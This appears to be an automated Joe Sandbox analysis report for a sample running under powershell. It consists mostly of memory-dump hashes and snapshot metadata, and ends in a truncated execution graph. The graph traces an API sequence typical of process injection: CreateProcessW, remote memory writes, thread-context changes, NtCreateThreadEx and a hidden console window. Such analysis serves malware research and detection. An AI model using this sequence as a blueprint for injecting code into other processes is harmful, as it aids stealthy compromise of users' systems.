                                                                                                                                                                                                                                                • Opcode ID: 54a55c79a8f313d3902a45f49a89439a9965efebe8d18c8b7962db442fb0ff5e
                                                                                                                                                                                                                                                • Instruction ID: 411ad6feebf353c883a31342f74b0953e791c0b734b6e926334aa6ba0279ba4a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54a55c79a8f313d3902a45f49a89439a9965efebe8d18c8b7962db442fb0ff5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73313C70A012099FDB04DFA9D4947EEBBF6EF88354F148029E445EB350FB749C818BA5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8a0dd3f2cfe3fb46f153c29e489aa88faf7be74849b643d74f76deab547a5044
                                                                                                                                                                                                                                                • Instruction ID: 6ee0637c5496a5fa8dc601c308376cde81a43e9b7500bd5ad760eeecb383a95e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a0dd3f2cfe3fb46f153c29e489aa88faf7be74849b643d74f76deab547a5044
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9315630A012099FCB14DF69D994ADEBBF2FF88610F148528D816EB391EB34AC45CF91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 62ee2b3d885211ade5df75bbf0e9d148367c916255b537275f5c1a26853005f2
                                                                                                                                                                                                                                                • Instruction ID: 1a692f1dc0c8d85bb8f97ea7502853ebd08ad75b4fd89fbe1d76972b49eb3c4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62ee2b3d885211ade5df75bbf0e9d148367c916255b537275f5c1a26853005f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3316D70A002048FCB14EF68D458ADEBBF2FF88725F148469D406EB3A1DB35AC85CB91
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 39f6c0b9de7b45909a001ddeefa96063594020b15e0a405939f3017a1c9b821d
                                                                                                                                                                                                                                                • Instruction ID: 22d500287eb14c85bb28a759cae9ba38666c6f89e68a7268816e6fbee07b40b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39f6c0b9de7b45909a001ddeefa96063594020b15e0a405939f3017a1c9b821d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D01F1316087849FD715CB79C494AA97FE4EF45210F1848EEE08ECBBA2DB21F885C741
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f9e825a7739139d14446123f3376a33b0a3ca1329fbe0e30a5a81e3f0f00aa47
                                                                                                                                                                                                                                                • Instruction ID: e7f430826923088558eed4ed58bc08b70f7965715c512aa2e656fcd55270733d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9e825a7739139d14446123f3376a33b0a3ca1329fbe0e30a5a81e3f0f00aa47
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA0180357022148FCB119B74E8486EEBBB5FF88215F04446DE90A93342DB31A952CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 28295ab20747bf6e5c73c7b916d109fe4f9b7aaa6ab436762212f11a04568925
                                                                                                                                                                                                                                                • Instruction ID: 8b6701e1f4bdc1228b4d16e6c55f869607b456d1286e1c786cd4775ceb9c0886
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28295ab20747bf6e5c73c7b916d109fe4f9b7aaa6ab436762212f11a04568925
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 391109352047508FC729DF75D09089AB7F6EF9931532089ADD48A87BA0DB32F845CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d05385dbb7330279e0e46a03f50ee06ab10afb13d090cb0f2fa2caba1cf4ddeb
                                                                                                                                                                                                                                                • Instruction ID: 0aea3bf8e96bd68bf50a5ed6589e1e4c8a0219cdf37e718b7d0865b3ce6e70b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d05385dbb7330279e0e46a03f50ee06ab10afb13d090cb0f2fa2caba1cf4ddeb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E501813130A3901FD7128A7A9C549BB7FE9DF8662070945ABF985CB262C961CD04C760
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473030336.000000000453D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0453D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_453d000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8be7ee82a78ad9e199bdbc39180dbe8d6ccb30c3223966b5a5b6965088697b79
                                                                                                                                                                                                                                                • Instruction ID: 20d9f6b689eabaaa1cd41014c077900b61abd39593082f97ecbec7e063cb5086
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8be7ee82a78ad9e199bdbc39180dbe8d6ccb30c3223966b5a5b6965088697b79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C701F731504304AFE7208F22EC84BA7FBF8EF41635F08C41AED480A142E279A449EAB1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473030336.000000000453D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0453D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_453d000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 96adff6a007be83c916486ae59fe2eb742c41e21ba37367dcd224755ece26796
                                                                                                                                                                                                                                                • Instruction ID: 8928994df4cc126feb05db5f412140471a28b2fb7d57e7f09be1a2eb5545b3c5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96adff6a007be83c916486ae59fe2eb742c41e21ba37367dcd224755ece26796
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D01526240E3C09FD7128B259C94B96BFB4EF43625F1DC1DBD8888F193C2695849D772
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2b5dab42818e29c64973e3e045c30464a954f9310e4e03b13065dfee2a686ccd
                                                                                                                                                                                                                                                • Instruction ID: a072a119b01a85b3d7132bde7d848c3f27da62d67ace768fa23ff745eb6299a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b5dab42818e29c64973e3e045c30464a954f9310e4e03b13065dfee2a686ccd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56F022312093946FD7059768D8849EFBBE4EF8A271700019EE04ACB252DE20AC49C7B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473030336.000000000453D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0453D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_453d000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 45d21a916e0f7726495be287ec1cd8e48a82faa4af2f261aa0e78ffdd429109d
                                                                                                                                                                                                                                                • Instruction ID: 5786caf93022cb2d7511f9078520451e85339dd0098c784935467f271a89130b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45d21a916e0f7726495be287ec1cd8e48a82faa4af2f261aa0e78ffdd429109d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F0F976600600AF9720CF0AD985C67FBBDEBD4774719C55AE84A4B612C671FC41DEA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b9c15eac6c9b3d9276d11f318b6692a4db3ba42994335218228c70a87b60c4b1
                                                                                                                                                                                                                                                • Instruction ID: c8dac4c35773774eedc21961704e2b83ffa7f90b30ac5bca83e848183ccbdc10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9c15eac6c9b3d9276d11f318b6692a4db3ba42994335218228c70a87b60c4b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF0C2356042404FE301AB68C4187EA7FA2DFC1319F24806ED9459B296CE392846DBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473030336.000000000453D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0453D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_453d000_powershell.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22c23690807e6e5d90abf972c78b988e74f54ad6127dbeb9218cfaa56161a241
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7E0E5353006108F83109B1ED898CA6B7FAEFDEA6531900A9E589DB731DA61EC02CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ac4faebe9f27a1d4dd574068f3e402cc43cac55d750ba82eb3b8788bee1bc9e1
                                                                                                                                                                                                                                                • Instruction ID: 6a4e08cb0c14f53530d91ecd89d817482f14abee2d5b1eee2d0d69fcda42c068
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac4faebe9f27a1d4dd574068f3e402cc43cac55d750ba82eb3b8788bee1bc9e1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE09231715090A7CB19C66DD8448FABF76DFC9320F0480BFE88BAB254DA326956D7E1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1f60c724fb0e2a63ecab5a87ccd403b5e5971a6b5d76c451e16b02e12dbdffd8
                                                                                                                                                                                                                                                • Instruction ID: 061a91a6a3285dce24d91bdf554a3a21b9e7bc9cb2b05e7986188cc834f4b6c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f60c724fb0e2a63ecab5a87ccd403b5e5971a6b5d76c451e16b02e12dbdffd8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16F06D39A12214DFCB00CB98E685D9DFBB2FF48325B158555E90AA7352CB31AD42DB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8c73dbc04d24f0b71344d75008477d40df24714ee0d7f74d151fcc0c763fa621
                                                                                                                                                                                                                                                • Instruction ID: e08f609fd963991d922e7601f4a68c3b732f77311e24390f92af4971a498612e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c73dbc04d24f0b71344d75008477d40df24714ee0d7f74d151fcc0c763fa621
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E026123562910BCB5766FC0A105F62E8A4FC215930900AFC584CB293FC04DD4983F2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b9aa088b63aa69e86de5babc4d4d89263e3220a76a27b2d49e26a996be0318f6
                                                                                                                                                                                                                                                • Instruction ID: 55e0c6e1f8ad66c0b706146820054060a3180a6d20aefe929d5cd07fc74fdce4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9aa088b63aa69e86de5babc4d4d89263e3220a76a27b2d49e26a996be0318f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13F0653530A3514BD70A2778951C6DD3F62DFC5625F0940AFD515C7243CF38594583D5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c29d84baddfc20e95b05f3ddbd5a6b79397d4b9cac6c0e9c34ccf0def5804ca4
                                                                                                                                                                                                                                                • Instruction ID: c47049f2f9a647e339f8607fc0d48792f8f5643a078c0513f39272e2ba8bdc47
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c29d84baddfc20e95b05f3ddbd5a6b79397d4b9cac6c0e9c34ccf0def5804ca4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FE0862570D2D01B9B17917D64604EA6FE78AC722431D81FEE4C5CB253D8428C068391
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: db6b1f12809bfb1e37664066e2c383b8eb1fd062fedbe52526046b03bc652853
                                                                                                                                                                                                                                                • Instruction ID: 8c6f62d9595a7c3a8c8c36c5cb78ddd890ab53cf275381ee3ab4047b0cbdc996
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db6b1f12809bfb1e37664066e2c383b8eb1fd062fedbe52526046b03bc652853
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1F0E570A023049BD7649FB9D89C7DABBE9FB44320F00446DE65ED7380DB3978858B90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9d04854df031cfe0bd1bd4dda4513ac5efedbf6bc81545e4593ba61f957466d7
                                                                                                                                                                                                                                                • Instruction ID: 93a2714c900e64936256a63473ee1d8274ecebf95e8e2714890741253397536b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d04854df031cfe0bd1bd4dda4513ac5efedbf6bc81545e4593ba61f957466d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E0ED75E042499FC740DFBDD88269DFFF0AB49210B1085AEC958DB202F7315596CBE2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0300afe73bf747b8aced1fae8744fdf46b71bf5c49a27390b2d0d0a73b11e116
                                                                                                                                                                                                                                                • Instruction ID: ba7dab5316684966fddaa65adfc5882ffd3611072364b3b10f87d59e2d4d1003
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0300afe73bf747b8aced1fae8744fdf46b71bf5c49a27390b2d0d0a73b11e116
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE0DF3630621447CB083B79A40C7EE7B56EFC4725F04402ED61683341DF38284283E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 24ef4029ede22e8e722aa75e41f2a5ef28b8f93c016e37141346618b832f80ba
                                                                                                                                                                                                                                                • Instruction ID: 9d8bd02c540b42e004a1289cd7103c2ff80b91f2175d3b673aadef5a3214271d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24ef4029ede22e8e722aa75e41f2a5ef28b8f93c016e37141346618b832f80ba
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CC08C1401E3D00EEF43933888991627F714E4302930E40C7C080CE867C428840ACB63
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cef5dc95775ea7ca263d87c8a5894f20cf1d874ba8e74c2c06338577e8431e31
                                                                                                                                                                                                                                                • Instruction ID: ef46202ec0f32d106d428d2b0edc27edbca8ebd3ad9722f849883acd11664cdc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cef5dc95775ea7ca263d87c8a5894f20cf1d874ba8e74c2c06338577e8431e31
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60B09230044708CFC258AFB9E8148287729BB406153C004A8E80E0A2928F76E888DA54
Memory Dump Source
• Source File: 00000003.00000002.1479916663.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_8740000_powershell.jbxd

Execution Graph

Execution Coverage: 16.2%
Dynamic/Decrypted Code Coverage: 1.5%
Signature Coverage: 4.6%
Total number of Nodes: 1002
Total number of Limit Nodes: 10
___scrt_is_nonwritable_in_current_image 12180->12182 12181 6d59749d dllmain_raw 12184 6d5974b7 dllmain_crt_dispatch 12181->12184 12192 6d597483 12181->12192 12182->12181 12183 6d597498 12182->12183 12182->12192 12185 6d596c40 __DllMainCRTStartup@12 5 API calls 12183->12185 12184->12183 12184->12192 12186 6d5974d8 12185->12186 12187 6d597509 12186->12187 12189 6d596c40 __DllMainCRTStartup@12 5 API calls 12186->12189 12188 6d597512 dllmain_crt_dispatch 12187->12188 12187->12192 12190 6d597525 dllmain_raw 12188->12190 12188->12192 12191 6d5974f0 12189->12191 12190->12192 12193 6d5973b8 __DllMainCRTStartup@12 86 API calls 12191->12193 12194 6d5974fe dllmain_raw 12193->12194 12194->12187 12196 6d597746 12195->12196 12198 6d59774f 12196->12198 12199 6d5976e3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12196->12199 12198->12175 12199->12198 12200 fc5170 12203 fc5183 12200->12203 12201 fc5351 12203->12201 12207 fc4d6c 12203->12207 12211 fc6060 12203->12211 12215 fc605f 12203->12215 12219 fc4d78 12203->12219 12208 fc61b0 CloseHandle 12207->12208 12210 fc621e 12208->12210 12210->12203 12212 fc609e 12211->12212 12223 6d593c10 12212->12223 12216 fc609e 12215->12216 12218 6d593c10 48 API calls 12216->12218 12217 fc60c1 12217->12203 12218->12217 12220 fc5e20 LoadLibraryW 12219->12220 12222 fc5e9f 12220->12222 12222->12203 12246 6d593c6f _unexpected 12223->12246 12224 6d596970 NtWriteVirtualMemory 12225 6d5969cd 12224->12225 12225->12246 12226 6d595f37 NtWriteVirtualMemory 12226->12246 12227 6d594dbb CreateProcessW 12227->12246 12228 6d5961f9 NtWriteVirtualMemory 12228->12246 12229 6d5968c4 NtGetContextThread 12229->12246 12230 6d594bca VirtualAlloc 12230->12246 12231 6d596726 CloseHandle CloseHandle 12231->12246 12234 6d596512 NtCreateThreadEx 12234->12246 12235 6d596630 NtSetContextThread NtResumeThread 12235->12246 12236 6d5956c4 NtWriteVirtualMemory 12236->12246 12237 6d595148 NtAllocateVirtualMemory 12237->12246 12238 6d596877 12239 
6d597250 _ValidateLocalCookies 5 API calls 12238->12239 12240 fc60c1 12239->12240 12240->12203 12241 6d596bf4 CloseHandle CloseHandle 12241->12246 12242 6d596b36 NtCreateThreadEx 12242->12246 12243 6d595198 NtWriteVirtualMemory 12243->12246 12244 6d594a5c GetConsoleWindow ShowWindow 12252 6d591360 12244->12252 12246->12224 12246->12226 12246->12227 12246->12228 12246->12229 12246->12230 12246->12231 12246->12234 12246->12235 12246->12236 12246->12237 12246->12238 12246->12241 12246->12242 12246->12243 12246->12244 12247 6d591360 23 API calls 12246->12247 12248 6d595e41 NtReadVirtualMemory 12246->12248 12250 6d594ed2 NtGetContextThread 12246->12250 12251 6d59532a NtWriteVirtualMemory 12246->12251 12275 6d5936d0 12246->12275 12282 6d591000 12246->12282 12247->12246 12248->12246 12250->12246 12251->12246 12268 6d591389 __InternalCxxFrameHandler 12252->12268 12253 6d5920d2 CloseHandle 12253->12268 12254 6d591dd9 CreateFileA 12254->12268 12255 6d59252a VirtualProtect 12255->12268 12256 6d5921be MapViewOfFile 12256->12268 12257 6d591a35 GetCurrentProcess 12286 6d597e70 12257->12286 12259 6d592a43 GetModuleFileNameA 12259->12268 12260 6d591a61 GetModuleHandleA 12260->12268 12261 6d591bfc K32GetModuleInformation 12261->12268 12262 6d59276e CloseHandle CloseHandle 12262->12268 12263 6d591f42 CreateFileMappingA 12263->12268 12264 6d591d09 GetModuleFileNameA 12264->12268 12265 6d5927f6 CloseHandle 12265->12268 12266 6d592be7 CloseHandle 12266->12268 12267 6d592ad6 CreateFileMappingA 12267->12268 12268->12253 12268->12254 12268->12255 12268->12256 12268->12257 12268->12259 12268->12261 12268->12262 12268->12263 12268->12264 12268->12265 12268->12266 12268->12267 12269 6d592615 VirtualProtect 12268->12269 12270 6d5929f9 K32GetModuleInformation 12268->12270 12271 6d592a76 CreateFileA 12268->12271 12272 6d5929d8 12268->12272 12269->12268 12270->12268 12271->12268 12273 6d597250 _ValidateLocalCookies 5 API calls 12272->12273 12274 6d5929e2 12273->12274 12274->12246 12280 6d593721 
